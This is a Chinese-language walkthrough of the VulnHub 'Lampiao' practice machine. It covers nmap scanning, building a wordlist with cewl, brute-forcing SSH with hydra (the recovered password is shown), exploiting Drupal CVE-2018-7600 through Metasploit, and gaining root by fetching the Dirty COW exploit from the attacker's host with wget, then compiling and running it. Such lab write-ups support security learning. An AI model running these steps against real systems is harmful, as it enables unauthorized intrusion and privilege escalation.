靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/
靶机难度:中等
工具:kalilinux; 一个灵活的脑子 ; 一双手
目标:得到root权限&找到flag.txt
作者:木木北星
声明:这里使用的技术仅用于学习交流目的,如果列出的技术用于其他任何目标,我概不负责。
第一步信息收集
信息收集在整个渗透过程中占80%左右。在虚拟机中确认攻击的ip地址,nmap获取目标ip地址(有很多工具我个人比较喜欢nmap)
使用命令:nmap -sP 192.168.222.0/24
解释:(ip地址是你自己的物理机ip第三个小数点后面改0/24)
得到ip后开始探索ip地址开放端口和一些服务。继续用nmap全端口扫描:
使用命令:nmap -sS -sV -T5 -A -p- 192.168.222.137
可以看出靶机上有三个可用的开放端口22、80、1898端口。这里对22端口,尝试ssh弱口令爆破,并没有结果,这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf、hydra等,后期文章攻击也会使用到。由于目标靶机上的端口80可用,我们在浏览器上打开了目标计算机的IP,它显示了一个有趣的页面:
F12 查看这是一个静态页面,没发现什么有用的信息所以换1898端口:
可以分别进入两个页面:
第一栏点进去内容翻译后并没有什么有效的信息,第二栏点进去细心的我发现了这是node/3,这是第三栏的内容,说明还有第二栏的内容没有显示,修改下页面试试。
发现两个文件:
第一个文件内是一个音频,语音内容为:user tiago,则用户名为:tiago
第二个文件是一个二维码,扫码后的内容是一句话:Try harder!Muahuahua...没用的信息
接下来开始用工具对网站进行爆破扫描...(也可以使用御剑)
使用命令: dirb http://192.168.222.137:1898 -o out
找到一个robots.txt的文件,后台打开看看:
经过漫长的信息收集终于在CHANGELOG.txt文件中发现了网站的基本信息
这是一个基于Drupal 7的博客或是社交网站。
cewl:通过爬行网站获取关键信息创建一个密码字典
hydra:神器九头蛇,网上有太多资料
使用命令:cewl http://192.168.222.137:1898/?q=node/1 -w mmbx.txt
hydra -l tiago -P mmbx.txt 192.168.222.137 ssh
先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码:
用户: tiago
密码: Virgulino
重要的来了!!!!使用用户名tiago进行ssh登陆连接,成功连接,但是不能用sudo su进行提权!!
第二部shell提权
现在利用收集到的信息进行提权
刚刚在文件收集到这个网站是2016年的Durpal7
这边我们查询到Drupal漏洞CVE-2018-7600,我们尝试使用MSF进行渗透试试。
先输入指令:msfconsole
再search CVE-2018-7600
然后再use这个指令
rhosts设置靶机IP
rport设置靶机端口
run开跑
成功通过漏洞渗透进入系统,获得低权限用户,和前面ssh登陆的tiago用户权限类似,这是另外一种渗透的方法,可以好好学习。
下一步要找到反弹shell获取root权限,通过网上对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权,非常有名的一个漏洞提权目前已经修复,仅供参考学习。
命令:searchsploit dirty查找脏牛提权shell,利用40847.cpp
思路是继续开启本地pthon服务,然后把40847.cp发送到靶机上
命令:python -m http.server 8879 开启服务
网站登录端口(这里注意,ip地址是你kali的IP地址)
命令:wget http://192.168.222.128 :8879/40847.cpp
将40847.cp上传到靶机上
命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
- -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
- -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
- -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
- -std=c++11就是用按C++2011标准来编译的
- -pthread 在Linux中要用到多线程时,需要链接pthread库
- -o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件,可直接提权。
打开文件成功看到靶机root的密码
直接登录root
输入ls(列出目前工作目录所含之文件及子目录)
发现flag最后查看文件
最后:如果本人有哪些步骤没有做的精细的望大佬勿喷,本人也喜欢结实五湖四海的朋友一起探讨学习技术。
有兴趣的可以斯我